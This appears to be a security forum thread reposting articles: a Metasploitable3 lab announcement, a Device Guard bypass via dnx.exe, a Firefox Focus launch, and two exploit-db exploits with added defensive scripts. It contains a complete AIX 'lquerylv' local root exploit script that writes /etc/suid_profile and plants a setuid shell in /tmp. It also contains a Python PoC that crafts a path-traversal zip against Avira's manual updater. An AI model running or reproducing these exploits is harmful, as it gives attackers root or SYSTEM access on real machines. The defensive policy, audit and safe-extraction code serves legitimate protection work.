Keep in mind, instead of downloading a VM like before, Metasploitable3 requires you to issue a few commands and build for VirtualBox (VMware will be supported in the future). To do so, your machine must have the following requirements installed:
Packer
Vagrant
Vagrant Reload Plugin
VirtualBox

To build automatically: run the build_win2008.sh script if using bash. If you are using Windows, run build_win2008.ps1. If the command completes successfully, run "vagrant up". The build process takes anywhere between 20 and 40 minutes, depending on your system and Internet connection. After it's done, you should be able to open the VM within VirtualBox and log in. The default username is "vagrant" with password "vagrant".

To build manually, please refer to the README documentation.

If you have experience in making vulnerable images, or would like to suggest a type of exploitation scenario for Metasploitable3, your feedback is welcome!

It is for People with Different Skill Levels

Metasploitable2 back then was more of a test environment heavily for Metasploit. It was straightforward to play, and it didn't take long to find the right exploit to use and get a high-privileged shell. But you see, we want to make you try a little harder than that.

First off, not every type of vulnerability on Metasploitable3 can be exploited with a single module from Metasploit, but some can. Also by default, the image is configured to make use of some mitigations from Windows, such as different permission settings and a firewall. For example, if you manage to exploit a service in the beginning, you will most likely be rewarded with a lower-privileged shell. This part shouldn't be too difficult for young bloods who are new to the game. But if you want more than that, higher-privileged services tend to be protected by a firewall, and you must figure out how to get around that.

For special reasons, the firewall can be disabled if you set the MS3_DIFFICULTY environment variable:

$ MS3_DIFFICULTY=easy vagrant up

If the image is already built, you can simply open a command prompt and do:

$ netsh advfirewall set allprofiles state off

It Has Flags

One very common thing about performing a penetration test is going after corporate data. Well, we can't shove any real corporate data in Metasploitable3 without any legal trouble, therefore we have introduced flags throughout the whole system. They serve as "data you want to steal", and each is in the form of a poker card image of a Rapid7/Metasploit developer, and is packaged in one or more of these ways:
Obfuscation
Strict permission settings
File attributes
Embedded files

Getting your hands on these flags exercises your post-exploitation muscle, and may require some level of reverse engineering knowledge. A hint about these flags can be found from one of the services. In the future, we will be publishing more blog posts about how to find these flags.

It is Expandable

In real-world penetration testing, a lot of it involves being able to break into one machine, and leverage the information stolen from there against the next one. Stolen passwords and hashes are perfect examples of this. Instead of just having one virtual machine, our plan is to also have the capability to build multiple vulnerable images, and create a network of them. This allows the audience the opportunity to practice more post-exploitation techniques, pivoting, and breaking into the next box. Although our first image is Windows, the planning part of the Linux version has already begun. If you would like to jump on this train, please feel free to leave a comment on Github, or contribute.

And that's what our new toy is all about.

Last but not least, if you are trying out Metasploitable3 without Metasploit, either you are Neo from the Matrix, or you are nuts. Metasploit consists of thousands of modules, including exploits, auxiliary and post modules, and payloads that allow you to succeed in many kinds of attack scenarios. If you don't have this in your toolkit, please feel free to grab it here.

Sursa: https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3
-
BYPASSING APPLICATION WHITELISTING BY USING DNX.EXE
November 17, 2016 by enigma0x3

Over the past few weeks, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) researching Device Guard user mode code integrity (UMCI) bypasses. If you aren’t familiar with Device Guard, you can read more about it here: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/device-guard-deployment-guide. In short, Device Guard UMCI prevents unsigned binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode.

Recently, @mattifestation blogged about a typical Device Guard scenario and using the Microsoft-signed debuggers WinDbg/CDB as shellcode runners. Soon after, @subtee released a post on using CSI.exe to run unsigned C# code on a Device Guard system.

Taking their lead, I decided to install the Visual Studio Enterprise trial and poke around to see what binaries existed. After much digging, I stumbled across dnx.exe, which is the Microsoft .NET Execution environment. If you are curious, you can read more on dnx.exe here: https://blogs.msdn.microsoft.com/sujitdmello/2015/04/23/step-by-step-installation-instructions-for-getting-dnx-on-your-windows-machine/

In a Device Guard scenario, dnx.exe is allowed to execute as it is a Microsoft-signed binary packaged with Visual Studio Enterprise. In order to execute dnx.exe on a Device Guard system (assuming it isn’t already installed), you will need to gather dnx.exe and its required dependencies, and somehow transport everything to your target (this is an exercise left up to the reader).

With everything required now on our target host, we can start down the path of bypassing Device Guard’s UMCI. Since dnx.exe allows for executing code in dynamic scenarios, we can use it to execute arbitrary, unsigned C# code. Fortunately, there is a solid example of this on Microsoft’s blog above.

For example, we can create a C# file called “Program.cs” and add whatever C# code we want. To demonstrate the execution of unsigned code, we can keep things simple:

To satisfy the requirements of dnx.exe, a Project.json file is required, which specifies some of the requirements when executing the code. For this PoC, the example “Project.json” file can be used from Microsoft’s blog here. As stated in their post, we can execute our C# by placing “Program.cs” and “Project.json” in a folder called “ConsoleApp” (this can obviously be renamed/modified).

Now that we have our files, we can execute our C# using dnx.exe by going into the “ConsoleApp” folder and invoking dnx.exe on it. This is done on a PC running Device Guard:

As you can see above, our unsigned C# successfully executed and is running inside of dnx.exe.

Fortunately, these “misplaced trust” bypasses can be mitigated via code integrity policy FilePublisher file rules. You can read up on creating these mitigation rules here: http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html

You can find a comprehensive bypass mitigation policy here: https://github.com/mattifestation/DeviceGuardBypassMitigationRules

Cheers!
Matt Nelson

Sursa: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
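As an added example of the FilePublisher mitigation the post points to (not code from enigma0x3's post or from the DeviceGuardBypassMitigationRules repository), the following builds a deny rule for dnx.exe with the ConfigCI cmdlets and merges it into an existing policy; it assumes the ConfigCI module shipped with Windows 10 Enterprise / Server 2016, and the dnx.exe and policy paths are placeholders.

```powershell
# Added example: deny dnx.exe by FilePublisher in a Device Guard CI policy.
# Not part of the original post. Placeholder paths must be adjusted locally.
Import-Module ConfigCI

$DnxPath        = 'C:\path\to\dnx.exe'                                          # placeholder
$ExistingPolicy = 'C:\Windows\System32\CodeIntegrity\DeviceGuardPolicy.xml'     # placeholder
$DenyPolicy     = Join-Path $env:TEMP 'DenyDnx.xml'
$MergedPolicy   = Join-Path $env:TEMP 'DeviceGuardPolicy.merged.xml'
$BinaryPolicy   = Join-Path $env:TEMP 'SIPolicy.p7b'

function New-DenyRulesForBinary {
    # Returns FilePublisher deny rules for one signed binary. FilePublisher
    # keys on the signer, the original file name and a minimum version, so
    # the rule survives patches of the same binary; Hash is used only as a
    # fallback if the file does not carry the expected signature.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        throw "Binary not found: $Path"
    }
    New-CIPolicyRule -Level FilePublisher -Fallback Hash -DriverFilePath $Path -Deny
}

$rules = New-DenyRulesForBinary -Path $DnxPath

# Keep the deny rules in their own policy file so they can be reviewed and
# versioned separately from the allow policy. -UserPEs makes the rules apply
# to user-mode binaries (UMCI), which is where dnx.exe runs.
New-CIPolicy -Rules $rules -FilePath $DenyPolicy -UserPEs

# Merge into the deployed policy. Deny rules take precedence over allow rules
# during code integrity evaluation, so the signer-level allow for Microsoft
# binaries no longer covers dnx.exe.
Merge-CIPolicy -PolicyPaths $ExistingPolicy, $DenyPolicy -OutputFilePath $MergedPolicy

# Rule option 3 = Enabled:Audit Mode. Roll out in audit first; remove the
# option (Set-RuleOption -Delete) once the audit log shows no collateral hits.
Set-RuleOption -FilePath $MergedPolicy -Option 3

# Compile the XML into the binary form that Device Guard loads at boot.
ConvertFrom-CIPolicy -XmlFilePath $MergedPolicy -BinaryFilePath $BinaryPolicy
```

Deploy the .p7b as C:\Windows\System32\CodeIntegrity\SIPolicy.p7b (or via Group Policy) and reboot; audit-mode hits appear as event 3076 in Microsoft-Windows-CodeIntegrity/Operational, and 3077 once enforced.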
-
Introducing Firefox Focus – a free, fast and easy to use private browser for iOS
Nick Nguyen
November 17, 2016

Today, we’re pleased to announce the launch of Firefox Focus – a free, fast and easy to use private browser for iOS.

Firefox Focus

We live in an age where too many users have lost trust and lack meaningful controls over their digital lives. For some users, it seems as though your web activities can follow you everywhere – across devices, across accounts. To make matters worse, the web can often feel cluttered. That’s why we are introducing Firefox Focus. For the times when you don’t want to leave a record on your phone. You may be looking for information that in certain situations is sensitive – searches for engagement rings, flights to Las Vegas or expensive cigars, for example. And sometimes you just want a super simple, super fast Web experience – no tabs, no menus, no pop-ups. Firefox Focus gives you just that.

Firefox Focus is set by default to block many of the trackers that follow you around the Web. You don’t need to change privacy or cookie settings. You can browse with peace of mind, feeling confident in the knowledge that you can instantly erase your sessions with a single tap – no menus needed.

Firefox Focus Erase Button

Much of what makes mobile web pages slow is the technology used to track users on the web. Because Firefox Focus blocks these trackers, it is likely you’ll notice a performance boost on the many sites that track your behavior. When you occasionally see a site that doesn’t work because it is dependent on tracking, and if you don’t mind that kind of tracking, Firefox Focus makes it easy to open your current site in either Firefox or Safari.

We look forward to your feedback on Firefox Focus. You can download Firefox Focus from the App Store. Firefox Focus continues to operate as a Safari content blocker on iOS, and users will be able to take advantage of Tracking Protection on both Safari and Firefox Focus.
Sursa: https://blog.mozilla.org/blog/2016/11/17/introducing-firefox-focus-a-free-fast-and-easy-to-use-private-browser-for-ios/
-
How to Bypass iPhone Passcode to Access Photos and Messages
Nytro replied to Fi8sVrs's topic in Mobile security
They all require Siri. I wonder how many people have that junk enabled? -
Secret Back Door in Some U.S. Phones Sent Data to China
Nytro replied to QuoVadis's topic in Stiri securitate
It's not even the first time something like this has been discovered... -
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation

#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
#   local users to create or overwrite arbitrary files via a symlink attack on
#   the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
#   not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
#   environment variables, which allows local users to gain privileges by
#   leveraging a setuid-root program to create an arbitrary root-owned file
#   with world-writable permissions, related to libC.a (aka the XL C++ runtime
#   library) in AIX 5.3 and libc.a in AIX 6.1.
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
#   File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector.
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]

ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
APP=$0

function usage {
    echo "Usage: $APP [1] | [2] | [3]"
    echo
    echo "1 - MALLOCDEBUG file write -> escalation"
    echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
    echo "3 - MALLOCBUCKETS file write -> escalation"
    echo
    echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
    exit
}

function CVE20091786 {
    echo "[*] Exporting MALLOCDEBUG environment variable"
    MALLOCTYPE=debug
    MALLOCDEBUG=report_allocations,output:/etc/suid_profile
    export MALLOCTYPE MALLOCDEBUG
}

function CVE20092669 {
    echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
    _LIB_INIT_DBG=1
    _LIB_INIT_DBG_FILE=/etc/suid_profile
    export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
}

function CVE20143074 {
    echo "[*] Exporting MALLOCBUCKETS environment variable"
    MALLOCOPTIONS=buckets
    MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
    export MALLOCOPTIONS MALLOCBUCKETS
}

if [ -z "$1" ]; then
    usage
    exit 1
fi

while [ "$1" != "" ]; do
    case $1 in
        1 ) CVE20091786;;
        2 ) CVE20092669;;
        3 ) CVE20143074;;
        * ) usage
            break;;
    esac
    shift
done

if [ ! -x "/usr/sbin/lquerylv" ]; then
    echo "[-] lquerylv isn't executable. Tough luck."
    exit 1
fi

echo "[*] Setting umask to 000"
umask 000

echo "[*] Execute our vulnerable binary"
/usr/sbin/lquerylv >/dev/null 2>&1

if [ ! -e "/etc/suid_profile" ]; then
    echo "[-] /etc/suid_profile does not exist and exploit failed."
    exit 1
fi

echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile

echo "[*] Current id: `/usr/bin/id`"

echo "[*] Adding payload"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF

echo "[*] Unsetting env"
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE

echo "[*] Executing ibstat for fun and profit"
/usr/bin/ibstat -a >/dev/null 2>&1

if [ ! -e "$ROOTSHELL" ]; then
    echo "[-] Rootshell does not exist and exploit failed."
    exit 1
fi

echo "[*] Executing rootshell"
$ROOTSHELL

Sursa: https://www.exploit-db.com/exploits/40710/
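The chain above leaves two artifacts on disk that a defender can sweep for: a world-writable, root-owned /etc/suid_profile (the file the setuid binary creates under umask 000, which ksh reads in privileged mode instead of .profile), and a setuid copy of ksh dropped in /tmp. The following audit script is an added example written for this post, not code from the exploit author or from IBM; it walks a directory tree, flags exactly those two conditions, and exercises itself against a constructed sample tree in a temp directory (paths and mode bits in the sample are made up to mirror the post).

```python
"""Audit for lquerylv-style escalation artifacts (added example, not the exploit author's code)."""
import os
import stat
import tempfile

# Directories where a setuid file is never legitimate (relative to the audited root).
TEMP_DIRS = ("tmp/", "var/tmp/")


def classify(rel_path, mode, uid):
    """Return findings for one file given its st_mode and owner uid.

    rel_path is relative to the audited root, e.g. 'etc/suid_profile' for /etc/suid_profile.
    """
    findings = []
    if not stat.S_ISREG(mode):
        return findings
    # Artifact 1: the debug-output file the setuid binary created with umask 000.
    if rel_path.startswith("etc/") and mode & stat.S_IWOTH:
        findings.append("world-writable file under /etc")
    # Artifact 2: a setuid executable parked in a world-writable temp directory.
    if rel_path.startswith(TEMP_DIRS) and mode & stat.S_ISUID:
        findings.append("setuid file in a temp directory, owned by uid %d" % uid)
    return findings


def audit(root):
    """Walk root (normally '/') and return {relative_path: [findings]} for suspicious files."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)          # lstat: do not follow symlinks planted by an attacker
            except OSError:
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings = classify(rel, st.st_mode, st.st_uid)
            if findings:
                results[rel] = findings
    return results


def demo():
    """Build a constructed sample tree with both artifacts plus one clean file; return audit results."""
    root = tempfile.mkdtemp(prefix="aix-audit-")
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(os.path.join(root, "tmp"))

    profile = os.path.join(root, "etc", "suid_profile")   # mirrors /etc/suid_profile
    with open(profile, "w") as f:
        f.write("# placeholder contents\n")
    os.chmod(profile, 0o666)                              # world-writable, as umask 000 leaves it

    shell = os.path.join(root, "tmp", "shell-1234")       # mirrors /tmp/shell-<random>
    with open(shell, "wb") as f:
        f.write(b"#!/bin/sh\n")
    os.chmod(shell, 0o6755)                               # setuid+setgid, as in the post

    hosts = os.path.join(root, "etc", "hosts")            # clean control file
    with open(hosts, "w") as f:
        f.write("127.0.0.1 localhost\n")
    os.chmod(hosts, 0o644)

    return audit(root)


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        print(path, "->", "; ".join(findings))
```

Run it against a real host with `audit("/")`; the relative-path convention lets the same checks run over a mounted image or a forensic copy of the filesystem.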
-
Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution

# Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fixes the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response.
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file, it doesn't check for " ../ "
# characters, which makes it possible to do a path traversal and write anywhere in the system.
#
# Vulnerability Replication
# 1. Create a specially crafted zip file with the python script attached.
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed)
#    and will write this file to the root directory C:\
# 3. You can change the directory to the startup folder, and when the user reboots the script will get executed,
#    or you can write a malicious dll to a program directory or system32 directory which will get loaded
#    and we gain remote command execution.
# 4. Open avira free antivirus
# 5. Go to update -> Manual Update
# 6. Select the malicious file
# 7. Directory traversal was successful
#
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
#
# POC:

#!/usr/bin/python -w
import sys
import zipfile

banner = r"""
  ___        __        ____                  _    _     
 |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
 |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
"""
print(banner)

if len(sys.argv) != 2:
    print("[+] Usage : python exploit.py file_to_do_the_traversal [+]")
    print("[+] Example: python exploit.py test.txt")
    sys.exit(0)

print("[+] Creating Zip File [+]")
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
# Store the supplied file under an archive name that climbs out of the extraction directory
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print("[+] Created xvdf_fusebundle.zip successfully [+]")

# Fix:
# Update to the latest version.

Sursa: https://www.exploit-db.com/exploits/40741/
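The fix on the consuming side is to validate every archive member name before writing it. The routine below is an added example, not Avira's code and not part of the advisory: it refuses members with `..` components, absolute paths, backslash separators that would resolve the same way on Windows, and drive-letter prefixes, then re-checks the resolved target path as a second, independent guard. The archive it runs against is constructed in memory and holds one legitimate bundle file plus traversal entries shaped like the one the PoC writes (file names and contents are made up).

```python
"""Path-traversal-safe ZIP extraction (added example; not Avira's code or the advisory's PoC)."""
import io
import tempfile
import zipfile
from pathlib import Path


def is_unsafe_member(name):
    """True if an archive member name could land outside the extraction directory.

    ZIP names are supposed to use '/', but archives built on Windows may carry '\\',
    so both are treated as separators before the check.
    """
    normalized = name.replace("\\", "/")
    if not normalized or normalized.startswith("/"):
        return True                                  # empty name or absolute path
    if ":" in normalized.split("/")[0]:
        return True                                  # drive letter such as C:
    return any(part == ".." for part in normalized.split("/"))


def safe_extract(archive, dest):
    """Extract members that stay under dest; return the member names that were refused."""
    root = Path(dest).resolve()
    rejected = []
    for info in archive.infolist():
        if is_unsafe_member(info.filename):
            rejected.append(info.filename)
            continue
        target = (root / info.filename.replace("\\", "/")).resolve()
        # Independent second check on the resolved path (e.g. a symlinked parent directory).
        if target != root and root not in target.parents:
            rejected.append(info.filename)
            continue
        if info.is_dir():
            target.mkdir(parents=True, exist_ok=True)
            continue
        target.parent.mkdir(parents=True, exist_ok=True)
        with archive.open(info) as src, open(target, "wb") as dst:
            dst.write(src.read())
    return rejected


def build_sample_archive():
    """Constructed sample: one legitimate bundle file plus traversal entries shaped like the PoC's."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("fusebundle/manifest.txt", "benign update content\n")
        zf.writestr("../../../../../../../../test.bat", "echo traversal\r\n")
        zf.writestr(zipfile.ZipInfo("..\\..\\test.bat"), "echo traversal\r\n")
    return buf.getvalue()


def run_demo():
    """Extract the sample into a fresh temp dir; report what was refused and what was written."""
    dest = tempfile.mkdtemp(prefix="safe-extract-")
    with zipfile.ZipFile(io.BytesIO(build_sample_archive())) as zf:
        rejected = safe_extract(zf, dest)
    written = sorted(p.relative_to(dest).as_posix()
                     for p in Path(dest).rglob("*") if p.is_file())
    return {"rejected": rejected, "written": written}


if __name__ == "__main__":
    print(run_demo())
```

The name check is deliberately stricter than a resolved-path check alone: a member like `a/../b` is refused even though it would resolve inside the destination, because an updater has no reason to ship such names and rejecting them costs nothing.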